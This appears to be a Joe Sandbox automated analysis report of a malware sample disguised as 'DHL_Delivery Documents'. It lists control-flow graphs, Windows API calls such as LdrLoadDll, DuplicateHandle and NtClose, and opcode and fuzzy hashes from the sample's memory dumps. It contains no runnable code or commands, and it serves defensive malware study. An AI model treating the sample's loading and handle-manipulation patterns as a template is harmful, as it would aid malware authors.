                        control_flow_graph 651 2c1590c-2c15914 652 2c158b0-2c158d9 651->652 653 2c15916 651->653 656 2c158e2-2c15903 652->656 657 2c158db-2c158e1 652->657 654 2c15918-2c159d9 CreateActCtxA 653->654 660 2c159e2-2c15a3c 654->660 661 2c159db-2c159e1 654->661 657->656 668 2c15a4b-2c15a4f 660->668 669 2c15a3e-2c15a41 660->669 661->660 670 2c15a51-2c15a5d 668->670 671 2c15a60-2c15a90 668->671 669->668 670->671 675 2c15a42-2c15a44 671->675 676 2c15a92-2c15b14 671->676 675->668
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 02C159C9
                        Memory Dump Source
                        • Source File: 00000000.00000002.2079838550.0000000002C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2c10000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 8bd39086ed8b41ce7885037fd30fb6b0a9d24b1d73c23701c64754dfa078ad3e
                        • Instruction ID: 3728e897cc5ccc144fde592ff74dd391ebed08a2e3e20a0fc656ddd3f209df43
                        • Opcode Fuzzy Hash: 8bd39086ed8b41ce7885037fd30fb6b0a9d24b1d73c23701c64754dfa078ad3e
                        • Instruction Fuzzy Hash: 525113B1D00619CFDB20CFA9C8857DEBBF5BF89304F60806AD409AB251D775698ACF91
                        Function 02C1449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 678 2c1449c-2c159d9 CreateActCtxA 681 2c159e2-2c15a3c 678->681 682 2c159db-2c159e1 678->682 689 2c15a4b-2c15a4f 681->689 690 2c15a3e-2c15a41 681->690 682->681 691 2c15a51-2c15a5d 689->691 692 2c15a60-2c15a90 689->692 690->689 691->692 696 2c15a42-2c15a44 692->696 697 2c15a92-2c15b14 692->697 696->689
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 02C159C9
                        Memory Dump Source
                        • Source File: 00000000.00000002.2079838550.0000000002C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2c10000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 9cd2b289f757f443951733bb991ee8b57d43f84b90c0cdd79760208cc0650b47
                        • Instruction ID: 82c7eceae579ad64517969e8cb6245d0054d300df64306dadfc43ed97d9c1b7e
                        • Opcode Fuzzy Hash: 9cd2b289f757f443951733bb991ee8b57d43f84b90c0cdd79760208cc0650b47
                        • Instruction Fuzzy Hash: 3D41F5B0D0071DCBDB24CFA9C88579EBBB5FF85304F60806AD409AB251DB71694ACF91
                        Function 02C1D698 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 699 2c1d698-2c1d69c 700 2c1d6e2-2c1d734 DuplicateHandle 699->700 701 2c1d69e-2c1d6df 699->701 702 2c1d736-2c1d73c 700->702 703 2c1d73d-2c1d75a 700->703 701->700 702->703
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02C1D727
                        Memory Dump Source
                        • Source File: 00000000.00000002.2079838550.0000000002C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2c10000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: aa21b7637c50aa0ad553972326d6ef18c6fe55672d7e56658e5144320b503e74
                        • Instruction ID: 7d3c62a3948551cfd966595d4561d6168f25cc1a01381a5a3c70000db35ee249
                        • Opcode Fuzzy Hash: aa21b7637c50aa0ad553972326d6ef18c6fe55672d7e56658e5144320b503e74
                        • Instruction Fuzzy Hash: 993157B5C0024A9FCB10CFA9D484ADEFFF4EF49320F14815AE954A7250D374A941DFA1
                        Function 02C1D6A0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 707 2c1d6a0-2c1d734 DuplicateHandle 709 2c1d736-2c1d73c 707->709 710 2c1d73d-2c1d75a 707->710 709->710
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02C1D727
                        Memory Dump Source
                        • Source File: 00000000.00000002.2079838550.0000000002C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2c10000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: c48f26505a8d130d4680f3f603ec773ca74c68ba0a9985fa81b5596f6b054f2c
                        • Instruction ID: f301fa57d9230aa7364bfc6ead184c31376d1472fdfcbb512c384ba426524294
                        • Opcode Fuzzy Hash: c48f26505a8d130d4680f3f603ec773ca74c68ba0a9985fa81b5596f6b054f2c
                        • Instruction Fuzzy Hash: D121E2B5D00249AFDB10CFAAD984ADEBBF8FB48310F14801AE919A3310D374A944DFA1
                        Function 02C1A188 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 713 2c1a188-2c1b280 715 2c1b282-2c1b285 713->715 716 2c1b288-2c1b2b7 LoadLibraryExW 713->716 715->716 717 2c1b2c0-2c1b2dd 716->717 718 2c1b2b9-2c1b2bf 716->718 718->717
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02C1B099,00000800,00000000,00000000), ref: 02C1B2AA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2079838550.0000000002C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2c10000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 66a47ae8b75a45fcf6485dd0da63e29870c1478e30214994efaa45a2468708c0
                        • Instruction ID: 85f2478206e77c987ea3d6848d989bf12c9862748028b258172b44b56da04c6a
                        • Opcode Fuzzy Hash: 66a47ae8b75a45fcf6485dd0da63e29870c1478e30214994efaa45a2468708c0
                        • Instruction Fuzzy Hash: 8B1112B6D003099FCB14CF9AD448A9EFBF4EB89314F10842AE519A7700C379A949CFA5
                        Function 02C1B238 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 721 2c1b238-2c1b280 723 2c1b282-2c1b285 721->723 724 2c1b288-2c1b2b7 LoadLibraryExW 721->724 723->724 725 2c1b2c0-2c1b2dd 724->725 726 2c1b2b9-2c1b2bf 724->726 726->725
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02C1B099,00000800,00000000,00000000), ref: 02C1B2AA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2079838550.0000000002C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2c10000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 9e8ec3ea68fed14048ac0b2bf17451f8407af4faaaf70de496a76e272362b243
                        • Instruction ID: 8ae63b6a6f6c8889287a21fadc40ee7cad72df0bdf068069ad80721085dc7cd3
                        • Opcode Fuzzy Hash: 9e8ec3ea68fed14048ac0b2bf17451f8407af4faaaf70de496a76e272362b243
                        • Instruction Fuzzy Hash: 741126B6D003498FCB14CFAAD449ADEFBF4EB89314F11842AD519A7200C375A946CFA5
                        Function 02C1AFB8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 729 2c1afb8-2c1aff8 730 2c1b000-2c1b02b GetModuleHandleW 729->730 731 2c1affa-2c1affd 729->731 732 2c1b034-2c1b048 730->732 733 2c1b02d-2c1b033 730->733 731->730 733->732
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02C1B01E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2079838550.0000000002C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2c10000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: eeb61f6094757f1100760257aeea4a70e5993596e16fddd35cbc9c92100bcecb
                        • Instruction ID: 1fc7213cbc3ff74e77d6f42935e569da149a4bdab5d241b5c33cbc7e7b03dc92
                        • Opcode Fuzzy Hash: eeb61f6094757f1100760257aeea4a70e5993596e16fddd35cbc9c92100bcecb
                        • Instruction Fuzzy Hash: 40110FB5C002498FCB10CF9AD448A9EFBF4AB88218F10846AD429A7210D375A945CFA1
                        Function 0138D3D8 Relevance: .1, Instructions: 75COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2079370264.000000000138D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0138D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_138d000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a675a4948ca4a7f930e2c30dede25f187d52e61959e01cdc0adf465212ff1195
                        • Instruction ID: 41fb7a2c78ac0e8a64939a0dd7405d430b58fdb599c89b798470e07873cb2b30
                        • Opcode Fuzzy Hash: a675a4948ca4a7f930e2c30dede25f187d52e61959e01cdc0adf465212ff1195
                        • Instruction Fuzzy Hash: DD2148B1504304DFDB01EF98D9C0B56BF69FB84328F24C56DD90A1B296C736E416C6A1
                        Function 02B4D1D4 Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2079499022.0000000002B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B4D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b4d000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: edb45ded477af993f638f94d34465732bb25efe84685e49c552d8a564536c089
                        • Instruction ID: 51c677b2969b70fb6fa433e67af3c409fc39d80ec9b25997b2490f4b066e83af
                        • Opcode Fuzzy Hash: edb45ded477af993f638f94d34465732bb25efe84685e49c552d8a564536c089
                        • Instruction Fuzzy Hash: 302126B1604201EFDB05DF14D9C0B26BBA5FB88314F24CAADED8A4B352CB36D446DA61
                        Function 02B4D01C Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2079499022.0000000002B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B4D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b4d000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bbcf87a7c0f4717c13ea2ef7fdc7f8c63c8a696bcfc51a9a083e3632e0aff9db
                        • Instruction ID: ed97482487cf4cfd12991b5f135b78b9656f9612006fdca3817088bf6d6b7417
                        • Opcode Fuzzy Hash: bbcf87a7c0f4717c13ea2ef7fdc7f8c63c8a696bcfc51a9a083e3632e0aff9db
                        • Instruction Fuzzy Hash: A62104B1604241EFDB14DF14D9D4B26BBA5FB84314F24C5ADE80A4B356CB3AE407DA61
                        Function 02B4D006 Relevance: .1, Instructions: 63COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2079499022.0000000002B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B4D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b4d000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cdbc3d1c798ea00863a800ec162a0edfd05d0c118201f0f84e68c10a882ea113
                        • Instruction ID: 37b5dad99544d492f749c3c5bf16339250f5851109c0b96704eed038ed1397d6
                        • Opcode Fuzzy Hash: cdbc3d1c798ea00863a800ec162a0edfd05d0c118201f0f84e68c10a882ea113
                        • Instruction Fuzzy Hash: 9A2192755083809FCB02CF14D9D4B11BF71EB46214F28C5DAD8498F2A7C33AD81ADB62
                        Function 0138D3D3 Relevance: .1, Instructions: 56COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2079370264.000000000138D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0138D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_138d000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                        • Instruction ID: 3bc5084d683239505311038db88d37d84f4bb2ebbf53f61e974d560a73817d67
                        • Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                        • Instruction Fuzzy Hash: 6511DF72404340DFDB02DF48D5C4B56BF71FB84324F24C2A9D9090B656C33AE45ACBA1
                        Function 02B4D1CF Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2079499022.0000000002B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B4D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b4d000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                        • Instruction ID: 4e52a4115ce6bbcf95d551ca5459e9e354b5d818f1373cbfea50c152aa1049e9
                        • Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                        • Instruction Fuzzy Hash: 5E11BB75904280DFCB02CF10D5C4B15BBA1FB84214F24C6A9DC894B696C33AD40ADB61
                        Function 0138D745 Relevance: .0, Instructions: 45COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2079370264.000000000138D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0138D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_138d000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ed40b6c2eb9bea00cdd41085f50880d545038ebc361ce7f187cf26513b269991
                        • Instruction ID: b191f91f515bea6d1f4fc8f49ed0fde05600c20065f2509866f53ed513ad5957
                        • Opcode Fuzzy Hash: ed40b6c2eb9bea00cdd41085f50880d545038ebc361ce7f187cf26513b269991
                        • Instruction Fuzzy Hash: D101F2710043849AE710BFA9CDC4B26BFACDF41368F28C91AFD090A2C6D2399841CAB1
                        Function 0138D744 Relevance: .0, Instructions: 36COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2079370264.000000000138D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0138D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_138d000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bfd470d1fd269dabfc4e0b0fc0f159a59c6b141220a4767a5606ee9a79025279
                        • Instruction ID: 42547485e364cd7d30948268c16655c0816793f56d30b8b4092a1fe86cd9fa9d
                        • Opcode Fuzzy Hash: bfd470d1fd269dabfc4e0b0fc0f159a59c6b141220a4767a5606ee9a79025279
                        • Instruction Fuzzy Hash: 01F0C2714043809EE710AF1ACC88B62FFA8EB41278F18C45AFD080B286C3799844CAB0

                        Non-executed Functions

                        Function 02C1D384 Relevance: .3, Instructions: 264COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2079838550.0000000002C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2c10000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6f1ff33190b83d76f6928223bb05d1a7173a48aa673026d84d28fdfcc1f6c779
                        • Instruction ID: 90da5778b4dc5eec570caa44c40eaa045bb029070a0dfaaafe5a95197532bd5e
                        • Opcode Fuzzy Hash: 6f1ff33190b83d76f6928223bb05d1a7173a48aa673026d84d28fdfcc1f6c779
                        • Instruction Fuzzy Hash: A9A15B36E00309CFCF05DFA5C84459EB7B2FF86304B25856EE906AB265DB31EA15DB80

                        Execution Graph

                        Execution Coverage:1.1%
                        Dynamic/Decrypted Code Coverage:4%
                        Signature Coverage:6.3%
                        Total number of Nodes:174
                        Total number of Limit Nodes:18
                        execution_graph 95402 424703 95403 424712 95402->95403 95412 427a53 95403->95412 95405 424756 95417 42d413 95405->95417 95406 42472b 95406->95405 95409 424794 95406->95409 95411 424799 95406->95411 95410 42d413 RtlFreeHeap 95409->95410 95410->95411 95413 427ab0 95412->95413 95414 427ae7 95413->95414 95420 424413 95413->95420 95414->95406 95416 427ac9 95416->95406 95428 42b8a3 95417->95428 95419 424766 95421 4243b9 95420->95421 95424 4243fe 95420->95424 95425 42b543 95421->95425 95423 4243c0 95423->95416 95424->95416 95426 42b560 95425->95426 95427 42b571 NtClose 95426->95427 95427->95423 95429 42b8bd 95428->95429 95430 42b8ce RtlFreeHeap 95429->95430 95430->95419 95489 424373 95490 42438f 95489->95490 95491 4243b7 95490->95491 95492 4243cb 95490->95492 95495 42b543 NtClose 95491->95495 95493 42b543 NtClose 95492->95493 95494 4243d4 95493->95494 95499 42d533 RtlAllocateHeap 95494->95499 95497 4243c0 95495->95497 95498 4243df 95499->95498 95500 42e4f3 95501 42e503 95500->95501 95502 42e509 95500->95502 95503 42d4f3 RtlAllocateHeap 95502->95503 95504 42e52f 95503->95504 95505 42ab93 95506 42abb0 95505->95506 95509 1c52df0 LdrInitializeThunk 95506->95509 95507 42abd8 95509->95507 95431 41b003 95432 41b047 95431->95432 95433 42b543 NtClose 95432->95433 95434 41b068 95432->95434 95433->95434 95435 41e123 95436 41e149 95435->95436 95442 41e23d 95436->95442 95444 42e623 95436->95444 95438 41e1d8 95439 41e234 95438->95439 95438->95442 95455 42abe3 95438->95455 95439->95442 95450 427cc3 95439->95450 95443 41e2e4 95445 42e593 95444->95445 95446 42e5f0 95445->95446 95459 42d4f3 95445->95459 95446->95438 95448 42e5cd 95449 42d413 RtlFreeHeap 95448->95449 95449->95446 95451 427d20 95450->95451 95452 427d5b 95451->95452 95465 4189a3 95451->95465 95452->95443 95454 427d3d 95454->95443 95456 42ac00 95455->95456 95472 1c52c0a 95456->95472 95457 42ac2c 95457->95439 95462 42b853 95459->95462 95461 42d50e 95461->95448 95463 42b86d 95462->95463 95464 42b87e RtlAllocateHeap 95463->95464 95464->95461 95467 418983 95465->95467 95468 41898a 95467->95468 95469 42b8f3 95467->95469 95468->95454 95470 42b90d 95469->95470 95471 42b91e ExitProcess 95470->95471 95471->95468 95473 1c52c11 95472->95473 95474 1c52c1f LdrInitializeThunk 95472->95474 95473->95457 95474->95457 95475 413fe3 95476 413ffc 95475->95476 95481 4179a3 95476->95481 95478 41401a 95479 414066 95478->95479 95480 414053 PostThreadMessageW 95478->95480 95480->95479 95482 4179c7 95481->95482 95483 417a03 LdrLoadDll 95482->95483 95484 4179ce 95482->95484 95483->95484 95484->95478 95485 1c52b60 LdrInitializeThunk 95510 401936 95511 40194b 95510->95511 95514 42e9b3 95511->95514 95517 42d003 95514->95517 95518 42d029 95517->95518 95529 407513 95518->95529 95520 42d03f 95528 40199e 95520->95528 95533 41ae13 95520->95533 95522 42d05e 95523 42d073 95522->95523 95524 42b8f3 ExitProcess 95522->95524 95544 427633 95523->95544 95524->95523 95526 42d082 95527 42b8f3 ExitProcess 95526->95527 95527->95528 95530 407516 95529->95530 95548 4166e3 95530->95548 95532 407520 95532->95520 95534 41ae3f 95533->95534 95561 41ad03 95534->95561 95537 41ae84 95539 41aea0 95537->95539 95542 42b543 NtClose 95537->95542 95538 41ae6c 95540 41ae77 95538->95540 95541 42b543 NtClose 95538->95541 95539->95522 95540->95522 95541->95540 95543 41ae96 95542->95543 95543->95522 95545 42768d 95544->95545 95547 42769a 95545->95547 95572 4184f3 95545->95572 95547->95526 95549 4166fa 95548->95549 95551 416713 95549->95551 95552 42bf83 95549->95552 95551->95532 95553 42bf9b 95552->95553 95554 427a53 NtClose 95553->95554 95556 42bfb6 95554->95556 95555 42bfbf 95555->95551 95556->95555 95557 42abe3 LdrInitializeThunk 95556->95557 95558 42c014 95557->95558 95559 42d413 RtlFreeHeap 95558->95559 95560 42c02d 95559->95560 95560->95551 95562 41adf9 95561->95562 95563 41ad1d 95561->95563 95562->95537 95562->95538 95567 42ac83 95563->95567 95566 42b543 NtClose 95566->95562 95568 42aca0 95567->95568 95571 1c535c0 LdrInitializeThunk 95568->95571 95569 41aded 95569->95566 95571->95569 95574 41851d 95572->95574 95573 41898b 95573->95547 95574->95573 95580 414113 95574->95580 95576 41862a 95576->95573 95577 42d413 RtlFreeHeap 95576->95577 95578 418642 95577->95578 95578->95573 95579 42b8f3 ExitProcess 95578->95579 95579->95573 95586 414132 95580->95586 95581 414287 95581->95576 95583 414264 95583->95581 95600 41b123 NtClose RtlFreeHeap LdrInitializeThunk 95583->95600 95585 41427d 95585->95576 95586->95581 95588 414246 95586->95588 95590 414250 95586->95590 95591 4277d3 95586->95591 95596 413b63 95588->95596 95590->95581 95599 41b123 NtClose RtlFreeHeap LdrInitializeThunk 95590->95599 95592 427830 95591->95592 95593 42786b 95592->95593 95601 414293 95592->95601 95593->95586 95595 42784d 95595->95586 95614 42b7b3 95596->95614 95599->95583 95600->95585 95602 41427d 95601->95602 95606 4141d4 95601->95606 95602->95595 95603 414246 95604 413b63 LdrInitializeThunk 95603->95604 95605 414250 95604->95605 95607 414287 95605->95607 95612 41b123 NtClose RtlFreeHeap LdrInitializeThunk 95605->95612 95606->95603 95610 4277d3 4 API calls 95606->95610 95607->95595 95609 414264 95609->95607 95613 41b123 NtClose RtlFreeHeap LdrInitializeThunk 95609->95613 95610->95606 95612->95609 95613->95602 95615 42b7cd 95614->95615 95618 1c52c70 LdrInitializeThunk 95615->95618 95616 413b85 95616->95590 95618->95616 95619 41479d 95620 427a53 NtClose 95619->95620 95621 4147af 95620->95621

                        Executed Functions

                        Function 0042B543 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25nativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 43 42b543-42b57f call 404933 call 42c5e3 NtClose
                        APIs
                        • NtClose.NTDLL(004243C0,?,00000000,^gA,?,004243C0,^gA,0000008F,?,?,?,?,?,?,?,00427AC9), ref: 0042B57A
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_400000_DHL_Delivery Documents.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID: ^gA
                        • API String ID: 3535843008-2986628814
                        • Opcode ID: 63220fd5df8f3df6bacf692bfccfadad601a0f4eb739565101b61f2d2ceb0b5f
                        • Instruction ID: 03411ecb8d4fa88b11b9b1f6be6a87388c1a926cff93cb39c7ed998421602738
                        • Opcode Fuzzy Hash: 63220fd5df8f3df6bacf692bfccfadad601a0f4eb739565101b61f2d2ceb0b5f
                        • Instruction Fuzzy Hash: 48E04F752406147BD620AB6ADC42F9B775CDFC5711F404059FA08A7141D671B90187B4
                        Function 004179A3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 73 4179a3-4179bf 74 4179c7-4179cc 73->74 75 4179c2 call 42e113 73->75 76 4179d2-4179e0 call 42e633 74->76 77 4179ce-4179d1 74->77 75->74 80 4179f0-417a01 call 42cad3 76->80 81 4179e2-4179ed call 42e8d3 76->81 86 417a03-417a17 LdrLoadDll 80->86 87 417a1a-417a1d 80->87 81->80 86->87
                        APIs
                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417A15
                        Memory Dump Source
                        • Source File: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_400000_DHL_Delivery Documents.jbxd
                        Yara matches
                        Similarity
                        • API ID: Load
                        • String ID:
                        • API String ID: 2234796835-0
                        • Opcode ID: 7990f290981bd4aee8d21bcb8d2ae64449c1592f8a81b01ec6cffc28f3e0e825
                        • Instruction ID: 246b37b595cb1f8abe4634870689f303e8f754b1e926b61588038419cb0b2c3f
                        • Opcode Fuzzy Hash: 7990f290981bd4aee8d21bcb8d2ae64449c1592f8a81b01ec6cffc28f3e0e825
                        • Instruction Fuzzy Hash: BA0171B1E4020DABEF10DBE5DC42FDEB7B89B54304F0081AAE90897241F635EB588B95
                        Function 01C52B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 102 1c52b60-1c52b6c LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 509e50eeb20fd065feee69515e970b0e71d23a21dba16b599f4d468a5976e607
                        • Instruction ID: c6e48b6776d5f16463917372d1fd39809c3ed2a74ee9391c148138f369d0456f
                        • Opcode Fuzzy Hash: 509e50eeb20fd065feee69515e970b0e71d23a21dba16b599f4d468a5976e607
                        • Instruction Fuzzy Hash: CA9002E12025004341057158445561A400E97E0601B55C021E5014590EC525C9916225
                        Function 01C52DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 104 1c52df0-1c52dfc LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: f025c5fc1d4484864a32e4535f36051bd5f9ab59e6bcfdc84164a8eb4a206444
                        • Instruction ID: c2be082ad1c0980bb3d4dac169d5ad1b7eee878b5092eac2b1f75f97aa4eaf46
                        • Opcode Fuzzy Hash: f025c5fc1d4484864a32e4535f36051bd5f9ab59e6bcfdc84164a8eb4a206444
                        • Instruction Fuzzy Hash: 349002B120150453D1117158454570B000D97D0641F95C412A4424558ED656CA52A221
                        Function 01C52C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 103 1c52c70-1c52c7c LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 70a6ac943d3dc413c5734b081e822a649eadbea6b23c520a1ec529805fae5c77
                        • Instruction ID: 81f79c0dc8f027fb834008a01c269a9fe55f173f9e6e019b28b582347e5cdf9b
                        • Opcode Fuzzy Hash: 70a6ac943d3dc413c5734b081e822a649eadbea6b23c520a1ec529805fae5c77
                        • Instruction Fuzzy Hash: 329002B120158842D1107158844574E000997D0701F59C411A8424658EC695C9917221
                        Function 01C535C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_1be0000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
